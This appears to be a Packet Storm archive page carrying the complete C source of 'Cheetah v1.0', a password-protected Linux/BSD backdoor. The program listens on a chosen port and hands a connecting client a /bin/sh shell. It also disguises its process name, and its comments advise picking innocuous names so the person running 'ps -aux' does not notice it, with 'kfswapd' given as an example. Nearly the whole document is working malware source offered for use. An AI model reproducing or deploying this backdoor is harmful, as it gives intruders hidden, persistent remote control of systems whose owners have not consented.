Cheetah version 1.0 is a remote Linux/BSD backdoor that offer low CPU usage, Port/Backlog selection, a remote shell, user/password protection, and process faking.
14494a026dcba9f3ddc81a36464f7285e7aa4ab559ded6f69da75edda6346e4a// -------------------------------------------------------------
// Cheetah v1.0 - Remote Linux/BSD Backdoor
// -------------------------------------------------------------
// Features:
// Low-CPU
// Port/Backlog Selection
// Remote Shell
// User/Password Protection
// Process Faking
// -------------------------------------------------------------
// Usage: ./cheetah <user> <password> <port> <backlog> <process>
// -------------------------------------------------------------
// Note: The process faking is a bit buggy with arguments, so try
// to use common words for the user/pass so it won't look very
// suspicous to the person viewing 'ps -aux' ;)
// --------------------------------------------------------------
// By: Tal0n 03-30-04
// -------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SHELL "/bin/sh"
int main(int argc, char *argv[])
{
int lsock, rsock;
struct sockaddr_in server;
struct sockaddr_in client;
char inuser[BUFSIZ];
char inpass[BUFSIZ];
char *username;
username = argv[1];
char *password;
password = argv[2];
char *process;
process = argv[5];
char *banner = "\nCheetah v1.0, by Tal0n 03-30-04\n";
if(argc != 6)
{
printf("%s", banner);
printf("\nUsage: %s <user> <password> <port> <backlog> <process>",
argv[0]);
printf("\nExample: %s bob d1rtyh4rry 9000 20 kfswapd\n\n", argv[0]);
return 0;
}
if(argc == 6)
{
printf("%s", banner);
if((lsock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("\n\nError: Can't create socket!\n\n");
return -1;
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[3]));
server.sin_addr.s_addr = INADDR_ANY;
strcpy(argv[0], process);
signal(SIGCHLD, SIG_IGN);
if(bind(lsock, (struct sockaddr *)&server, sizeof(struct sockaddr)) < 0)
{
printf("\n\nError: Can't bind on port %s!\n\n", argv[3]);
return -1;
}
if(listen(lsock, argv[4]) < 0)
{
printf("\n\nError: Can't listen on port %s!\n\n", argv[3]);
return -1;
}
printf("\nInformation:");
printf("\n\t\tUsername: %s", username);
printf("\n\t\tPassword: %s", password);
printf("\n\t\tPort: %s", argv[3]);
printf("\n\t\tBacklog: %s", argv[4]);
printf("\n\t\tProcess: %s\n\n", process);
while(1)
{
int size;
size = sizeof(struct sockaddr);
rsock = accept(lsock, (struct sockaddr *)&client, &size);
dup2(rsock, 0);
dup2(rsock, 1);
dup2(rsock, 2);
printf("%s", banner);
printf("\nUser: ");
scanf("%s", &inuser);
printf("\nPassword: ");
scanf("%s", &inpass);
if((strcmp(username, inuser) != 0) || (strcmp(password, inpass) != 0))
{
printf("\nLogin Incorrect. Goodbye!\n\n");
close(rsock);
return 0;
}
if((strcmp(username, inuser) == 0) && (strcmp(password, inpass) == 0))
{
printf("\n\nLogin Correct. Entering Shell...\n\n");
execl(SHELL, SHELL, (char *)0);
close(rsock);
}
}
return 0;
}
}
Cheetah is a Linux/BSD Backdoor with user/pass authenciation and some nice
features.
_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*.
http://join.msn.com/?page=features/featuredemail
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed